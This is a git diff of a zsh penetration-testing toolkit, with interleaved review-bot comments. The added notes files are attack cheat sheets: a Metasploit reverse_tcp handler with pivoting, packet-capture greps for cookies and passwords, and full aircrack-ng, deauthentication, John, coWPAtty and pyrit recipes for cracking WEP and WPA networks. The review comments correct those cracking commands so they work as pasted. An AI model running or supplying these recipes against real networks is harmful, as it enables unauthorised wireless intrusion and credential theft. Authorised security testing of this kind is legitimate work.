diff --git a/README.md b/README.md
index 976f9d1..d36f7e3 100755
--- a/README.md
+++ b/README.md
@@ -9,22 +9,37 @@ Usability features: tor trigger (ton/tof), external ip check, tor check... and m
 Note: this project is a work in progress which we develop with one of my friend in our free time. If you use it, be prepared for some glitches.
-Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
-
-Installing full console after you have the dependencies: cp profile_files/.* -R ~/
-
-Using only the pentest function can be done by including: pentest_functions.zsh
+Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. If the dependencies are not met, the functions will still run, but outputs will be empty - at least in the currently status.
-Functions
-=========
+Install
+=======
-pawnpls - Automatically enumerate and start predefined attacks such as brute force.
+Full console install: git clone https://github.com/51x/PTZ && cd PTZ && cp profile_files/.* -R ~/
+
+Using only the pentest functions can be done by including just: pentest_functions.zsh
+If you want also the notes/knowledge database, you shoul add the v3das folder to you ~/.ptz/ folder.
+
+
+General function of PTZ
+=======================
+
+pawnpls - Automatically enumerate and start predefined attacks such as brute force. Output goes to ~/.ptz/$target/
 Example for single target: autopawn n0nexi-stent.com
 Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com"
-everythingworksornot\? - check if everything works or not for this script (tbd)
+ptzdepchk - check if all dependencies are installed or not, print if something is missing
+
+
+Notes functions
+===============
+
+n - query notes about a topic, use tab auto complete
+
+nls - list all the notes
+
+rnd - get random strings (lengths: 8,16,32,64)
 chk functions
@@ -45,12 +60,3 @@ johnzip - Crack zip files using john
 johnrar - Crack rar files using john
 Example: johnrar data.rar rockyou.txt
-
-
-help functions
-==============
-hlp - Get help of the hlp command
-hlprnd - Get random strings (lengths: 8,16,32,64)
-hlp - Get help about - not yet implemented
-i - Get information about a topic, use tab after i
diff --git a/profile_files/.ptz/v3das/_n b/profile_files/.ptz/v3das/_n
new file mode 100644
index 0000000..fb5f1ab
--- /dev/null
+++ b/profile_files/.ptz/v3das/_n
@@ -0,0 +1,3 @@
+#compdef n
+
+_arguments "1: :( $(ls ~/.ptz/v3das/ ) )"
diff --git a/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt b/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt
new file mode 100644
index 0000000..995512a
--- /dev/null
+++ b/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt
@@ -0,0 +1,17 @@
+# With "autoroute" it is possible to attack through the remote machine.
+
+# Start handler
+use exploit/multi/handler
+set payload windows/meterpreter/reverse_tcp
+set lhost 10.1.1.1
+
+# Add route to which network you want to look into
+run autoroute -s 10.2.2.0/24
+run autoroute -p
+
+# Scan
+use auxiliary/scanner/portscan/tcp
+set RHOSTS 10.2.2.0/24
+set THREADS 50
+set ports 20,21,22,25,53,69,80,139,443,445,993,8080
+
diff --git a/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt b/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt
new file mode 100644
index 0000000..264636a
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt
@@ -0,0 +1,7 @@
+
+tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie
+tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:"
+tcpdump -r file.cap -s 1024 -l -A dst domain.com
+
+tcpdump -A # show raw data
+
diff --git a/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt b/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt
new file mode 100644
index 0000000..cf685d2
--- /dev/null
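Review bot: The completion in `_n` builds its candidate list by parsing `ls ~/.ptz/v3das/`, which word-splits on whitespace and, because this file lives in the very directory it lists, offers `_n` itself as a topic. Letting the completion system enumerate the directory avoids both problems: `_arguments "1: :_files -W $HOME/.ptz/v3das"`. Note also that the names offered here keep their `.txt` suffix, which matches what the `n` function reads (`cat ~/.ptz/v3das/$1`) but not what `nls` prints, since `nls` strips the extension.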
+++ b/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt
@@ -0,0 +1,11 @@
+
+# tshark follow stream
+tshark -r -R "" -T fields -e tcp.stream
+tshark -q -r http.pcapng -z follow,tcp,ascii,1
+
+# etc
+tshark grep from http
+tshark -r file.cap 'http' | egrep -i "login|pass"
+tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
+tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R'http.request.method == "GET" || http.request.method == "HEAD"'
+
diff --git a/profile_files/.ptz/v3das/network_switch_cisco_reset.txt b/profile_files/.ptz/v3das/network_switch_cisco_reset.txt
new file mode 100644
index 0000000..a2310d5
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_switch_cisco_reset.txt
@@ -0,0 +1,7 @@
+
+# reset a cisco switch
+flash_init
+dir flash:
+rename flash:config.text flash:config.backup
+boot
+
diff --git a/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt b/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt
new file mode 100644
index 0000000..d8fca42
--- /dev/null
+++ b/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt
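Review bot: The first example under `# tshark follow stream` cannot run as written — `-r` has no capture file behind it and `-R ""` is an empty read filter — so it should at least be `tshark -r file.cap -T fields -e tcp.stream`, using the same `file.cap` placeholder as the later examples. The `tshark grep from http` line is a heading rather than a command and would read more clearly as `# grep from http`. On recent Wireshark releases `-R` is the two-pass read filter that needs `-2`, with `-Y` being the single-pass display filter, so the last example is worth re-checking against the tshark version these notes target.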
@@ -0,0 +1,75 @@
+# cracking WEP with clients
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
+aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
+aircrack-ng -0 $CAP_FILE
+
+
+# cracking WEP via a client
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth
+aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack
+aircrack-ng -0 -z -n 64 $CAP_FILE
+
+
+# clientless WEP cracking
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth
+aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA
+aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA
+packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA
+aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet
+aircrack-ng -0 $CAP_FILE
+
+
+# bypassing WEP SKA
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file
+aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack
+aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster
+aircrack-ng -0 -z -n 64 $CAP_FILE
+
+
+# cracking WPA PSK
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
+airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE
+
+
+# cracking WPA with John The Ripper
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
+# change to password folder
+vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"
+./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE
+
+
+# cracking WPA with coWPAtty
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
+cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID
+genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack
+cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack
+
+
+# cracking WPA with pyrit
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake
+pyrit list_cores
+pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough
+
+pyrit -i $WORDLIST import_password # Import the wordlist to the database
+pyrit -e $AP_ESSID create_essid # Add ESSID to the database
+pyrit batch
+pyrit -r $CAPTURE_FILE attack_db
+
diff --git a/profile_files/.zsh/pentest_functions.zsh b/profile_files/.zsh/pentest_functions.zsh
index 712a812..238f731 100644
--- a/profile_files/.zsh/pentest_functions.zsh
+++ b/profile_files/.zsh/pentest_functions.zsh
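Review bot: Several of the WPA commands have typos that fail when pasted: `airacrack-ng` under `# cracking WPA PSK`, `--worldlist=` in the John pipeline, `-2 s $AP_ESSID` (missing dash on `-s`) in the first coWPAtty line, and `HASH_FILENAME` written without the `$` that every other placeholder uses. The John pipeline also hands the capture to `-w` as if it were the wordlist; with `--stdout` piped in, aircrack-ng needs `-w -` to read candidates from stdin and the capture file as its positional argument. The corrected lines are below, everything else in the note stays as is. It would also help readers to say that `airodump-ng -w` takes a prefix and writes `$FILENAME-01.cap`, since the later steps alternate between `$FILENAME`, `$CAP_FILE` and `$CAPTURE_FILE` as though they were one thing.
```shell
# … unchanged: WEP sections and the airmon/airodump/aireplay capture steps …
aircrack-ng -0 -w $WORDLIST $CAPTURE_FILE
# … unchanged: john.conf editing …
./john --wordlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w - $CAPTURE_FILE
# … unchanged: coWPAtty capture steps …
cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 -s $AP_ESSID
genpmk -f $WORDLIST -d $HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack
cowpatty -r $CAPTURE_FILE -d $HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack
```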
@@ -1,26 +1,54 @@
+# Experimental version!
+
 debug=1
-function everythingworksornot"?" {
- echo "really?"
- # tba: dependency checks for all functions
+fpath=(~/.ptz/v3das $fpath)
+autoload -U compinit
+compinit
+zstyle ':completion:*' menu select=2
+
+function nls {
+ echo "You can get help from the following topics:"
+ for f in ~/.ptz/v3das/* ; do
+ echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
+ done
 }
-function i {
+function n {
+ # query knowledgebase, use tab after n
 if [ -d "~/.ptz/v3das" ]
 then
- cat ~/.ptz/v3das/
+ echo "knowledge base / notes are missing"
+ else
+ cat ~/.ptz/v3das/$1
 fi
 }
-function hlp {
- echo "this function is not yet implemented"
- if [ $# -ne 1 ]
- then
- echo "this function is not yet implemented"
- return
- fi
+function ptzdepchk {
+ # check if dependencies are met or not
+ type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
+ type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; }
+ type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; }
+ type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
+ type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; }
+ type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
+ type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
+ type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; }
+ type theharvester >/dev/null 2>&1 || { echo >&2 "theharvester is missing."; }
+ type dnsenum >/dev/null 2>&1 || { echo >&2 "dnsenum is missing."; }
+ type fierce >/dev/null 2>&1 || { echo >&2 "fierce is missing."; }
+ type nmap >/dev/null 2>&1 || { echo >&2 "nmap is missing."; }
+ type searchsploit >/dev/null 2>&1 || { echo >&2 "searchsploit is missing."; }
+ type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; }
+ #type dig >/dev/null 2>&1 || { echo >&2 "dig is missing."; }
+ #type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; }
+ #type arachni >/dev/null 2>&1 || { echo >&2 "arachni is missing."; }
+ #type hydra >/dev/null 2>&1 || { echo >&2 "hydra is missing."; }
+ type python >/dev/null 2>&1 || { echo >&2 "python is missing."; }
+ #type dirb >/dev/null 2>&1 || { echo >&2 "dirb is missing."; }
+
 }
@@ -35,11 +63,13 @@ function tof {
 function tip {
+ # check if tor is really used or not
 wget -qO- https://check.torproject.org/ -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" | egrep -i "Congratulations. This browser is configured to use Tor.|Sorry. You are not using Tor." | uniq
 }
 function wip {
+ # check public ip
 if [ $RANDOM -gt $RANDOM ]
 then
 wget -qO- -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" ipecho.net/plain
@@ -52,6 +82,7 @@ function wip {
 function chkhttpz {
+ # http response checks from a given host / port
 echo "HTTP responses"
 wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"
@@ -61,19 +92,13 @@ function chkcrt {
+ # check ssl certificate of a server
 openssl s_client -showcerts -connect $1:$2
 }
-function hlp {
- echo "You can get help from the following topics:"
- for f in ~/.ptz/v3das/* ; do
- echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
- done
-}
-
-
-function hlprnd {
+function rnd {
+ # get some random characters
 cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo;
 cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
 cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;
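Review bot: In `n`, the test `[ -d "~/.ptz/v3das" ]` can never succeed because a tilde inside double quotes is not expanded, and the branch is inverted anyway — the "missing" message sits in the branch taken when the directory exists — so the function always falls through to `cat`. Change the test to `if [[ ! -d ~/.ptz/v3das ]]`, keep the error message in that branch together with a `return 1`, and read the note with `cat ~/.ptz/v3das/"$1"` in the other. A bare `n` with no argument will `cat` the directory itself, so a `[[ -n "$1" ]]` guard that prints a usage line is worth adding. Note also that `nls` strips the `.txt` suffix when listing topics while `n` needs the full file name, so the names `nls` prints cannot be passed straight to `n`; either `nls` should print the file name or `n` should append `.txt` when the bare name does not exist.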